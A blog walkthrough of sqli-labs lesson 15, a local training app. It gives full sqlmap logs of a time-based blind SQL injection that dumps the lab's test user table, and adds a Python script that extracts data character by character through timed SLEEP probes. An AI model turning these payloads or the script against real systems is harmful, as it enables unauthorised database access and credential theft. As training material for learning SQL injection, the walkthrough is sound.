Sqli-labs 15

黎 浩然 / 14 December 2021 / Security

Injecting with sqlmap

Enumerating the databases

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.12.3#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:16:19 /2021-12-19/

[17:16:19] [INFO] testing connection to the target URL
[17:16:19] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[17:16:27] [INFO] resuming back-end DBMS 'mysql'
[17:16:28] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0516pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[17:16:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:16:29] [INFO] fetching database names
[17:16:29] [INFO] fetching number of databases
[17:16:29] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[17:16:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
7
[17:16:41] [INFO] retrieved:
[17:16:46] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[17:17:44] [INFO] retrieved: challenges
[17:18:15] [INFO] retrieved: mysql
[17:18:32] [INFO] retrieved: performance_schema
[17:19:29] [INFO] retrieved: phpmyadmin
[17:20:04] [INFO] retrieved: security
[17:20:28] [INFO] retrieved: test
available databases [7]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test

[17:20:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0516pm.csv'

[*] ending @ 17:20:43 /2021-12-19/

7 databases found.

Note that the SLEEP fires even though the left-hand side of the AND (username='sNpT') matches no row. sqlmap puts SLEEP() inside an uncorrelated derived table, (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi), and MySQL evaluates that subquery once when the statement runs, independently of how many rows survive the preceding conditions; a bare AND SLEEP(5) would only be evaluated for rows that already satisfied username='sNpT', so against a non-existent user no delay would be observable. This is why the same payload works without knowing any valid username.

Enumerating the current database name

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms --current-db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:40:00 /2021-12-19/

[17:40:00] [INFO] testing connection to the target URL
[17:40:00] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[17:40:10] [INFO] resuming back-end DBMS 'mysql'
[17:40:10] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0540pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[17:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:40:11] [INFO] fetching current database
[17:40:11] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[17:40:52] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:41:02] [INFO] adjusting time delay to 1 second due to good response times
security
current database: 'security'
[17:41:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0540pm.csv'

[*] ending @ 17:41:23 /2021-12-19/

The current database is security.

Enumerating the tables

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:31:38 /2021-12-19/

[18:31:38] [INFO] testing connection to the target URL
[18:31:38] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:31:44] [INFO] resuming back-end DBMS 'mysql'
[18:31:44] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0631pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:31:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:31:46] [INFO] fetching tables for database: 'security'
[18:31:46] [INFO] fetching number of tables for database 'security'
[18:31:46] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[18:32:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[18:32:00] [INFO] retrieved:
[18:32:10] [INFO] adjusting time delay to 1 second due to good response times
emails
[18:32:25] [INFO] retrieved: referers
[18:32:49] [INFO] retrieved: uagents
[18:33:11] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[18:33:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0631pm.csv'

[*] ending @ 18:33:23 /2021-12-19/

Enumerating the columns

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security -T users --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:35:56 /2021-12-19/

[18:35:56] [INFO] testing connection to the target URL
[18:35:56] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:36:01] [INFO] resuming back-end DBMS 'mysql'
[18:36:01] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0636pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:36:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:36:02] [INFO] fetching columns for table 'users' in database 'security'
[18:36:02] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[18:36:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[18:36:20] [INFO] adjusting time delay to 1 second due to good response times
3
[18:36:20] [INFO] retrieved: id
[18:36:27] [INFO] retrieved: int(3)
[18:36:52] [INFO] retrieved: username
[18:37:16] [INFO] retrieved: varchar(20)
[18:37:51] [INFO] retrieved: password
[18:38:20] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[18:38:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0636pm.csv'

[*] ending @ 18:38:56 /2021-12-19/

Dumping the usernames and passwords

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security -T users -C id,username,password --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:43:20 /2021-12-19/

[18:43:20] [INFO] testing connection to the target URL
[18:43:21] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:43:28] [INFO] resuming back-end DBMS 'mysql'
[18:43:28] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0643pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:43:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:43:29] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
[18:43:29] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'security'
[18:43:29] [INFO] resumed: 13
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[18:43:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:43:40] [INFO] resumed: 1
[18:43:40] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[18:43:46] [INFO] adjusting time delay to 1 second due to good response times
Dumb
[18:43:58] [INFO] retrieved: Dumb
[18:44:10] [INFO] resumed: 2
[18:44:10] [INFO] retrieved: I-kill-you
[18:44:48] [INFO] retrieved: Angelina
[18:45:11] [INFO] resumed: 3
[18:45:11] [INFO] retrieved: p@ssword
[18:45:43] [INFO] retrieved: Dummy
[18:45:59] [INFO] resumed: 4
[18:45:59] [INFO] retrieved: crappy
[18:46:20] [INFO] retrieved: secure
[18:46:37] [INFO] resumed: 5
[18:46:37] [INFO] retrieved: stupidity
[18:47:09] [INFO] retrieved: stupid
[18:47:31] [INFO] resumed: 6
[18:47:31] [INFO] retrieved: genious
[18:47:54] [INFO] retrieved: superman
[18:48:20] [INFO] resumed: 7
[18:48:20] [INFO] retrieved: mob!le
[18:48:43] [INFO] retrieved: batman
[18:49:00] [INFO] resumed: 8
[18:49:00] [INFO] retrieved: admin
[18:49:15] [INFO] retrieved: admin
[18:49:29] [INFO] resumed: 9
[18:49:29] [INFO] retrieved: admin1
[18:49:45] [INFO] retrieved: admin1
[18:50:01] [INFO] resumed: 10
[18:50:01] [INFO] retrieved: admin2
[18:50:18] [INFO] retrieved: admin2
[18:50:35] [INFO] resumed: 11
[18:50:35] [INFO] retrieved: admin3
[18:50:53] [INFO] retrieved: admin3
[18:51:11] [INFO] resumed: 12
[18:51:11] [INFO] retrieved: dumbo
[18:51:28] [INFO] retrieved: dhakkan
[18:51:49] [INFO] resumed: 14
[18:51:49] [INFO] retrieved: admin4
[18:52:06] [INFO] retrieved: admin4
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

[18:52:23] [INFO] table 'security.users' dumped to CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\localhost\dump\security\users.csv'
[18:52:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0643pm.csv'

[*] ending @ 18:52:23 /2021-12-19/

In practice only time-based (delay) injection is usable here: sqlmap identified a single injection point, a time-based blind on the uname parameter, and every step above (databases, current database, tables, columns and the users dump) was pulled through it one character at a time, which is why each step took minutes rather than seconds.
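As an added worked example (not code from the post, and not sqlmap's own code), the script below drives the same time-based blind technique by hand against the Less-15 login form. It makes concrete both the observation above that SLEEP() fires regardless of the username match (the IF/SLEEP sits in a derived table, like sqlmap's payload) and the enumeration sqlmap automated: each character is recovered by a 7-step binary search over ASCII 0..127, one timed request per step, which is where the minutes per value in the logs come from. Assumptions: the post's URL, a Less-15-style query shape (WHERE username='...' AND password='...', which the post does not show), a 2-second SLEEP, and a constructed offline stand-in for the server so the script runs without a target; live_request is the real transport and needs the third-party requests library.

```python
"""Manual time-based blind extraction against a Less-15-style login form.

Added example, not from the original post or from sqlmap.  The payload
shape follows the one sqlmap used above: the delay sits inside a derived
table, so MySQL evaluates it once per statement whether or not
username='...' matches any row.
"""
import re

TARGET_URL = "http://localhost/sqli-labs/Less-15/"  # target from the post
DELAY = 2  # seconds SLEEP()ed when the probed condition is TRUE (assumed)


def build_payload(expr: str, position: int, mid: int, delay: int = DELAY) -> str:
    """uname value that sleeps `delay` seconds iff the ASCII code of
    character `position` of SQL expression `expr` is greater than `mid`.

    Assumed server-side query (Less-15 style, not shown in the post):
      SELECT ... WHERE username='<uname>' AND password='<passwd>' LIMIT 0,1
    The trailing AND '1'='1 re-closes the quote that the injected ' opened.
    """
    cond = f"ASCII(SUBSTRING(({expr}),{position},1))>{mid}"
    return (f"x' AND (SELECT 1 FROM (SELECT IF({cond},SLEEP({delay}),0))t)"
            f" AND '1'='1")


def calibrate(request, samples: int = 3) -> float:
    """Measure the no-delay response time and derive the decision threshold.

    The probe's condition can never hold (ASCII('') = 0 > 200), so the server
    does not sleep; the slowest of `samples` round trips is the baseline,
    the same idea as sqlmap's 'statistical model' warm-up seen in the logs.
    """
    never_true = build_payload("''", 1, 200)
    baseline = max(request(never_true) for _ in range(samples))
    return baseline + DELAY / 2


def extract(request, expr: str, threshold: float, max_len: int = 32) -> str:
    """Recover the string value of `expr` one character at a time.

    Binary search over ASCII 0..127 costs 7 timed requests per character;
    an answer is TRUE when the round trip exceeds `threshold`.  Extraction
    stops when SUBSTRING runs past the end of the value (ASCII('') = 0).
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if request(build_payload(expr, pos, mid)) > threshold:
                lo = mid + 1  # ASCII(char) > mid
            else:
                hi = mid      # ASCII(char) <= mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def live_request(uname: str) -> float:
    """Real transport for the post's target: POST the form, return seconds.
    Needs the third-party `requests` package; not used in the offline run."""
    import requests
    form = {"uname": uname, "passwd": "", "submit": "Submit"}
    r = requests.post(TARGET_URL, data=form, timeout=DELAY + 10)
    return r.elapsed.total_seconds()


# Constructed offline stand-in for the vulnerable backend: it understands only
# the condition shape build_payload emits and fakes the elapsed time.
_PROBE_RE = re.compile(r"ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+)")


def make_simulated_request(values: dict):
    """Return a request() that 'evaluates' probes against `values`
    (SQL expression -> the string it would yield on the real server)."""
    def request(uname: str) -> float:
        m = _PROBE_RE.search(uname)
        if not m:
            return 0.05
        expr, pos, mid = m.group(1), int(m.group(2)), int(m.group(3))
        value = values.get(expr, "")
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        return DELAY + 0.05 if code > mid else 0.05
    return request


if __name__ == "__main__":
    req = make_simulated_request({"database()": "security"})
    threshold = calibrate(req)
    print(extract(req, "database()", threshold))  # security
```

To run it against the lab, pass live_request instead of the simulated one and widen max_len for longer values such as a GROUP_CONCAT of table names; the threshold step matters, because a fixed cut-off like "took longer than 5 seconds" misclassifies answers as soon as the network jitters, which is also why sqlmap warns about not stressing the connection during time-based runs.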
